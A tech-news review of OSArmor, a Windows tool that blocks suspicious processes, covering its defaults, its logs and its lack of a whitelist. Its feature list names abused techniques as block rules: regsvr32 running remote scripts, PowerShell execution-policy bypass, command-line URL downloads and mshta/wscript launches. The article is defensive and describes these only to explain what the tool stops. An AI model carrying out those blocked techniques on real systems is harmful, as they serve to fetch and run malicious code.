OSArmor monitors and blocks suspicious processes on Windows - gHacks Tech News

OSArmor monitors and blocks suspicious processes on Windows

OSArmor is a new security program by NoVirusThanks for Microsoft Windows devices that monitors the system to block suspicious processes or actions on the system.

The security program has basic anti-exploit protection built into it, but it is not comparable to Microsoft EMET or Malwarebytes Anti-Exploit, as its focus is on preventing certain processes from executing in first place or certain activities from being executed.

A basic example is the blocking of processes that have double file extensions, sample.txt.exe to hide their actual type from unsuspecting users.

OSArmor review

osarmor

OSArmor is compatible with all recent versions of the Microsoft Windows operating system. The application needs to be installed before it can be used. The installer itself is clean, and the program is launched right after installation.

The interface is basic at this point in time. It displays session information about the number of blocked processes, the last blocked process, and the date and time that happened.

You cannot do much other than opening the logs folder or the configuration. First time users may want to open the configuration first as it lists all the security features OSArmor supports.

osarmor configuration

Most protective options are enabled by default. The list is rather long, here is a short listing of interesting ones:

  • Block execution of pif, com and double file extensions.
  • Block USB spreading malware.
  • Prevent "important" system modifications via bcedit.exe.
  • Block direct execution of scripts and exe files from archives.
  • Prevent regsrv32 from executing remote scripts and /i: parameter.
  • Block processes executed from wscript.exe, cscript.exe, mshta.exe and wmic.exe.
  • Block executionpolicy bypass and windowstyle hidden in PowerShell.
  • Block remote URL downloads from the command line.
  • Block direct execution of JavaScript and VBscript code.
  • Limit Windows Screensaver files to Windows folder.
  • Block execution of schtasks.exe.

The only options that are not enabled block the execution of unsigned processes from Local AppData, Roaming AppData, CommonAppdata, and Control Panel Applets.

The program comes without help file which makes it a tool for advanced users. It runs silently in the background for the most part and writes any processes that it blocks to daily log files.

The log files are a history of blocked processes, and they are the only option to troubleshoot issues. Logs list date, time and processes, as well as rules that blocked the process from execution.

One of the main shortcomings of OSArmor is that it comes without whitelist. You can only disable a protective feature if you notice that legitimate processes are blocked by the application.

The program needs a whitelist direly, and an interface that lists all blocked processes directly so that you can whitelist certain blocked processes easily.

Closing Words

OSArmor 1.0 is a promising security program for Windows that blocks activity that is often abused by malware and other unwanted software. The lack of control over what gets blocked is the program's main weakness at this point.

An option to display a prompt (allow or deny execution, research online) would be useful, and a whitelist needs to be implemented as well so that false positives can be addressed without having to turn off a feature completely.

Summary
software image
Author Rating
1star1star1stargraygray
5 based on 14 votes
Software Name
OSArmor
Operating System
Windows
Software Category
Security
Landing Page
Advertisement

We need your help

Advertising revenue is falling fast across the Internet, and independently-run sites like Ghacks are hit hardest by it. The advertising model in its current form is coming to an end, and we have to find other ways to continue operating this site.

We are committed to keeping our content free and independent, which means no paywalls, no sponsored posts, no annoying ad formats or subscription fees.

If you like our content, and would like to help, please consider making a contribution:


Previous Post: «
Next Post: »

Comments

  1. NVT Fan said on December 19, 2017 at 8:44 pm
    Reply

    No-Virus-Thanks has many good tools.

  2. KeZa said on December 21, 2017 at 4:18 pm
    Reply

    Thnx

  3. rdsu said on December 25, 2017 at 3:20 pm
    Reply

    Very good and promising…!!!

  4. bara said on December 31, 2017 at 11:10 pm
    Reply

    OSarmor est la solution qui va combler la limite des antivirus.

Leave a Reply

Check the box to consent to your data being stored in line with the guidelines set out in our privacy policy

Please note that your comment may not appear immediately after you post it.